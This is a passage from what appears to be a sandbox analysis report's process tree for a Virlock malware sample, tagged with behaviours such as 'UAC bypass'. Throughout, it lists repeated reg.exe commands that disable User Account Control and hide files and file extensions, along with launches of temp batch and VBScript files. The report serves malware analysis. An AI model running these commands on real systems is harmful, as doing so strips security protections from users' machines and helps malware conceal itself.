94⤵
- Modifies registry key
PID:4628

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
94⤵
- UAC bypass
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FsEsQEUg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
94⤵
PID:1612

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
95⤵
PID:3292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
92⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4360

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
92⤵
PID:4020

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
92⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqkIEAMY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
92⤵
PID:3520

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
93⤵
PID:2480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
90⤵
PID:3500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
90⤵
- Modifies registry key
PID:5040

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
90⤵
PID:3208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RqccwUkM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
90⤵
PID:2960

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
91⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
88⤵
- Modifies visibility of file extensions in Explorer
PID:2272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
88⤵
- Modifies registry key
PID:1480

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
88⤵
- UAC bypass
PID:3940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XMkgYwsM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
88⤵
PID:4336

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
89⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
86⤵
PID:432

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
86⤵
PID:3200

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
86⤵
- UAC bypass
PID:3292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aGQQEgsM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
86⤵
PID:4156

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
87⤵
PID:4872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
84⤵
- Modifies visibility of file extensions in Explorer
PID:3528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
84⤵
- Modifies registry key
PID:1252

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
84⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSkgAQgY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
84⤵
PID:3560

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
85⤵
PID:900

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
82⤵
- Modifies registry key
PID:4912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
83⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
82⤵
- Modifies registry key
PID:4384

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
82⤵
- UAC bypass
PID:3832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qSkcoQgo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
82⤵
PID:2856

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
83⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
80⤵
- Modifies visibility of file extensions in Explorer
PID:3752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
80⤵
PID:4672

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
80⤵
- UAC bypass
- Modifies registry key
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jeEQwokc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
80⤵
PID:2436

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
81⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
78⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
78⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
78⤵
- UAC bypass
PID:1012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
79⤵
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LacgIowA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
78⤵
PID:4884

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
79⤵
PID:4816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
76⤵
- Modifies visibility of file extensions in Explorer
PID:4908

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
76⤵
- Modifies registry key
PID:548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
76⤵
- UAC bypass
PID:2624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hmMAokog.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
76⤵
PID:2408

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
77⤵
PID:3484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
74⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
74⤵
- Modifies registry key
PID:764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
74⤵
PID:3528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tigYMkIo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
74⤵
PID:1580

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
75⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
72⤵
- Modifies visibility of file extensions in Explorer
PID:3188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
72⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
72⤵
- Modifies registry key
PID:724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SeAgIgEE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
72⤵
PID:4168

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
73⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
70⤵
- Modifies visibility of file extensions in Explorer
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
70⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
70⤵
- UAC bypass
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WCUcsMck.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
70⤵
PID:2000

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
71⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
68⤵
- Modifies registry key
PID:1180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
68⤵
- Modifies registry key
PID:3312

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
68⤵
- UAC bypass
- Modifies registry key
PID:2148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iAwcMEkM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
68⤵
PID:3304

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
69⤵
PID:3952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
66⤵
- Modifies visibility of file extensions in Explorer
PID:2716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
66⤵
PID:2996

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
66⤵
- UAC bypass
- Modifies registry key
PID:1804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VSsoUQYk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
66⤵
PID:652

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
67⤵
PID:3200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
64⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
64⤵
PID:2964

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
64⤵
- Modifies registry key
PID:1140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWggEIMg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
64⤵
PID:1452

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
65⤵
PID:3572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
62⤵
- Modifies visibility of file extensions in Explorer
PID:2700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
62⤵
PID:2088

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
62⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xMQMsEMc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
62⤵
PID:2784

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
63⤵
PID:4428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
60⤵
- Modifies visibility of file extensions in Explorer
PID:1608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
60⤵
PID:4924

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
60⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JakwEMAA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
60⤵
PID:2340

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
61⤵
PID:4508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
58⤵
- Modifies visibility of file extensions in Explorer
PID:3960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
58⤵
PID:4992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
58⤵
PID:2092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oOsEoYYY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
58⤵
PID:3116

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
59⤵
PID:3620

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
56⤵
- Modifies visibility of file extensions in Explorer
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
56⤵
- Modifies registry key
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
56⤵
- UAC bypass
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ECIUUkcs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
56⤵
PID:1808

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
57⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
54⤵
- Modifies visibility of file extensions in Explorer
PID:3656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
54⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
54⤵
- UAC bypass
PID:3400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TqMwAkwA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
54⤵
PID:3428

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
55⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
52⤵
PID:5092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
52⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
52⤵
- UAC bypass
PID:2468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XYMAYQMI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
52⤵
PID:4484

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
53⤵
PID:4404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
50⤵
- Modifies visibility of file extensions in Explorer
PID:1944

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
50⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
50⤵
- UAC bypass
- Modifies registry key
PID:2180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\huEUccIM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
50⤵
PID:4508

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
51⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
48⤵
- Modifies visibility of file extensions in Explorer
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
48⤵
PID:608

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
48⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fWwEAMYU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
48⤵
PID:3504

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
49⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
46⤵
PID:3744

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
46⤵
PID:3308

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
46⤵
- Modifies registry key
PID:548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GwMcEIks.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
46⤵
PID:3284

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
47⤵
PID:5052

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
44⤵
PID:4452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
44⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
44⤵
PID:3896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUQIgwcg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
44⤵
PID:4628

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
45⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
42⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
42⤵
PID:4504

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
42⤵
- UAC bypass
PID:1580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SkoUsoIY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
42⤵
PID:4428

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
43⤵
PID:3832

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
40⤵
- Modifies visibility of file extensions in Explorer
PID:4924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
40⤵
PID:3416

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
40⤵
- Modifies registry key
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tYwYsUAc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
40⤵
PID:4524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
41⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
38⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
38⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
38⤵
- UAC bypass
PID:2264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VmccQsQk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
38⤵
PID:4564

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
39⤵
PID:2852

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
36⤵
- Modifies visibility of file extensions in Explorer
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
36⤵
PID:4472

C:\Windows\SysWOW64\reg.exe
